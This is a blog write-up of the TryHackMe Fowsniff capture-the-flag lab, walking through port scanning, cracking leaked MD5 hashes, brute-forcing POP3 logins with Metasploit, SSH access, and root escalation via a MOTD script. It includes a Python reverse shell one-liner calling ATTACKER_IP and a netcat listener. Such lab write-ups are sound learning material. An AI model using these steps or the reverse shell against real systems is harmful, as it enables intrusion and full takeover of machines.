---
title: "Fowsniff CTF - Writeup"
date: 2024-11-03
# weight: 1
tags: ["Infosec", "CTF"]
author: "Ligniform"
showToc: true
TocOpen: false
draft: false
hidemeta: false
comments: false
description: "A writeup of TryHackMe's Fowsniff room"
disableHLJS: true # to disable highlightjs
disableHLJS: false
disableShare: true
hideSummary: false
ShowReadingTime: true
ShowBreadCrumbs: true
ShowWordCount: true
UseHugoToc: true

---
CTF Time!  
This time I'm trying out [TryHackMe's Fowsniff CTF](https://tryhackme.com/r/room/ctf).  
I'm going into this blind with no prior knowledge, so expect some detours and dead-ends. I'm also going to be censoring any flags/passwords/hashes out.  

### Room overview
>This boot2root machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (its amazing how much information Google can find for you), decoding hashes, brute forcing a pop3 login and much more!

This room is guided, so I shouldn't get too stuck. As my first CTF (without a team anyway) this should be pretty fun.  

Let's get started!  

### Question one
>Deploy the machine. On the top right of this you will see a Deploy button. Click on this to deploy the machine into the cloud. Wait a minute for it to become live.

Easy enough. Just join the room.  

### Question two
>Using nmap, scan this machine. What ports are open?

For CTF's, and most labs for THM, I use my own kali VM. The THM 'AttackBox' can be used for free users, but you only get an hour.  
It's pretty easy to set up your own VM. There's a few [VM images available for download](https://www.kali.org/get-kali/#kali-virtual-machines) from the Kali site.  

Once your VM is all set up you can download an openvpn file to use from the VM. Easy peasy!  

Once the VPN was connected I ran an `nmap` scan over the target IP:
```
┌──(kali@kali)-[~]
└─$ nmap -sV -p- -A -T4 10.10.220.243    
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.10.220.243
Host is up (0.30s latency).
Not shown: 65100 closed tcp ports (conn-refused), 431 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry 
|_/
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE RESP-CODES CAPA USER TOP PIPELINING UIDL
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: IDLE AUTH=PLAINA0001 more have ENABLE listed ID post-login Pre-login LOGIN-REFERRALS SASL-IR LITERAL+ capabilities IMAP4rev1 OK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2360.31 seconds
```
This scan took ages! I could've used something else like `masscan`, but I'm trying to stick with what the room suggests for now. It took about 39 minutes total, not too shabby.  

Oddly this question doesn't require an answer. You can *technically* just click 'Complete' and head on to question three. Keeping track of what's available and open to possible exploitation is important though.  

### Question three
>Using the information from the open ports. Look around. What can you find?

The open ports tell us a few things. The one I want to look at first is the webserver running on port 80.  

The website looks pretty basic, but a 'security advisory' is visible. 

>Fowsniff's internal system suffered a data breach that resulted in the exposure of employee usernames and passwords.

>Client information was not affected.

>Due to the strong possibility that employee information has been made publicly available, all employees have been instructed to change their passwords immediately.

>The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.

>We will return to full capacity after a service upgrade.

Sounds like we chose the good place to start.  

### Question four
>Using Google, can you find any public information about them?

The first thing I did was check out referenced `@fowsniffcorp` twitter account. Initially I was worried I wouldn't be able to view this due to the silly changes made on twitter's side. Thankfully the profile is available, and has a few interesting posts!  
```
FowSniffCorp Pwned!
@FowsniffCorp
Is that your sysadmin? roflcopter
stone@fowsniff:********************************

------------------------------------------------------------------------
https://pastebin.com/378rLnGi
```
There's a few pastebin links on the profile, all of which have been removed. Thankfully the links are archived on the [wayback machine](http://http://web.archive.org/web/20210715001726/https://pastebin.com/378rLnGi) so we can still see the leaked credentials. Yay!  

(Censored version of the dump)

```
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
 
 
mauer@fowsniff:********************************
mustikka@fowsniff:********************************
tegel@fowsniff:********************************
****@fowsniff:********************************
seina@fowsniff:********************************
stone@fowsniff:********************************
mursten@fowsniff:********************************
parede@fowsniff:********************************
sciana@fowsniff:********************************
 
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!
 
Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!
 
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P
 
l8r n00bz!
 
B1gN1nj4 
```

### Question five
>Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

At first glance this seemed pretty easy, we even get given a site to use.  

This room was written four years ago, hashkiller seemed a bit... clunky. [Crackstation](https://crackstation.net/) worked for a few passwords, but searching the answer seemed a bit like cheating.  

So, time to use `hashcat`.  

I wrote all the hashes to a file and ran hashcat over it:
```
┌──(kali@kali)
└─$ hashcat ./hashes /usr/share/wordlists/rockyou.txt -m 0  
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 7700X 8-Core Processor, 3371/6807 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile './hashes' on line 9 (f7fd98d380735e859f8b2ffbbede5a7e ): Token length exception

* Token length exception: 1/10 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

Hashes: 9 digests; 8 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

********************************:**********               
********************************:**********
********************************:**********
********************************:**********
********************************:**********
********************************:**********
********************************:**********
```

We recovered 7/8 passwords, not too shabby. I put the only failure through hashcat by itself and found a result, so I added them all to another file - `cracked`

### Question six
>Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

I'm sure we can.  
We can pass the `cracked` file as the password list when using the `auxiliary/scanner/pop3/pop3_login` module in metasploit.  
We can also create a new `users` file and add all the usernames from the leaked credentials from earlier. 
```
msf6 auxiliary(scanner/pop3/pop3_login) > set PASS_FILE /home/kali/Documents/THM/fowsniff/cracked
PASS_FILE => /home/kali/Documents/THM/fowsniff/hashes
msf6 auxiliary(scanner/pop3/pop3_login) > set USER_FILE /home/kali/Documents/THM/fowsniff/users
USER_FILE => /home/kali/Documents/THM/fowsniff/users
```
After `exploit`ing this, we get a successful crack. Cool. 

### Question seven
>What was seina's password to the email service? 

We answer this in the above question by finding it. This is one of the two questions that actually needs an answer.  

### Question eight
>Can you connect to the pop3 service with her credentials? What email information can you gather?

We can do this with `netcat`

```
+OK Welcome to the Fowsniff Corporate Mail Server!
user ********
+OK
pass ********
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.
```
We can see two emails, cool!

### Question nine
>Looking through her emails, what was a temporary password set for her?

This question follows on from the previous one pretty well, still in the `netcat` session, we can run `RETR` to view a specific email. Let's give the first one a shot.

```
RETR 1
+OK 1622 octets
Return-Path: <****@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: ****@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: ****@fowsniff

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is ****************

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone
```
### Question ten 
>In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH.

Oddly worded ;) but it's a good guide on what to do.  
If we weren't given this clue I probably would have added that temporary password to a `ssh_passwords` file, then tried to brute force all users again.  
I was stuck on this question for a few minutes. I kept trying the sender from the above question, until I decided to read the *second* email in the users inbox:
```
RETR 2
+OK 1280 octets
Return-Path: <****@fowsniff>
X-Original-To: ****@fowsniff
Delivered-To: ****@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: ****@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: ****@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.
```

This gives us some clues, including that the sender of *this* email went home early, so they didn't change the default `ssh` password. Let's try using that.

```
┌──(kali㉿kali)-[~]
└─$ ssh ****@10.10.157.142
****@10.10.157.142's password: 

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions


   ****  Welcome to the Fowsniff Corporate Server! **** 

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.


Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
****@fowsniff:~$ 
```

We're in!

### Question eleven
>Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group? 

We can run `find / -group users -type f 2>/dev/null` to find what files can be executed by the group, and throw away errors so it doesn't clog stuff up. 

```
****@fowsniff:~$ find / -group users -type f 2>/dev/null
/****/**/*******
/home/****/.cache/motd.legal-displayed
/home/****/Maildir/dovecot-uidvalidity
/home/****/Maildir/dovecot.index.log
/home/****/Maildir/new/1520967067.V801I23764M196461.fowsniff
/home/****/Maildir/dovecot-uidlist
/home/****/Maildir/dovecot-uidvalidity.5aa21fac
/home/****/.viminfo
/home/****/.bash_history
/home/****/.lesshsQ
/home/****/.bash_logout
/home/****/term.txt
/home/****/.profile
/home/****/.bashrc
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/tasks
```
Most of what's shown is normal stuff. The very top file looks like what we should be editing. 

### Question twelve
>Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

We're given a python reverse shell here, that's good! We can just pop that at the end of the file we found in the question above. 

```
****@fowsniff:~$ nano /****/**/*******
printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ATTACKER_IP,1234));os.dup2(s.fileno(),0); o$
```

### Question thirteen
>If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!

This question was also a little confusing. I decided to just check if the file we edited was in the `update-motd.d` file response for the header. 

```
****@fowsniff:~$ cd /etc/update-motd.d/
****@fowsniff:/etc/update-motd.d$ ls
00-header  10-help-text  91-release-upgrade  99-esm
****@fowsniff:/etc/update-motd.d$ cat 00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

#[ -r /etc/lsb-release ] && . /etc/lsb-release

#if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
#       # Fall back to using the very slow lsb_release utility
#       DISTRIB_DESCRIPTION=$(lsb_release -s -d)
#fi

#printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

sh /****/**/*******
```

### Question fourteen
>Start a netcat listener (nc -lvp 1234) and then re-login to the SSH service. You will then receive a reverse shell on your netcat session as root!

Can do, pretty easy. Make sure the reverse shell is set up, then log out, open the listener, and log back in so it runs.  

---

### Conclusion
That was fun. It was pretty guided, but it was fun. There were some moments I got stuck and had to do some searching, but we got it down.  

Like I mentioned, this was pretty much the first CTF that I've done without a team behind me. In the past I've always had someone a lot more experienced and knowledgeable that I could ask for help.  
A *lot* of the content on TryHackMe have writeups that just give you the answer. I've written about how [this is a bad practice](/stack-overflow/) before if you want to see my thoughts.  

It's been a while since I've posted anything here. Now that I'm on a decent daily streak on TryHackMe I might start writing up more rooms/CTFs, stay tuned!
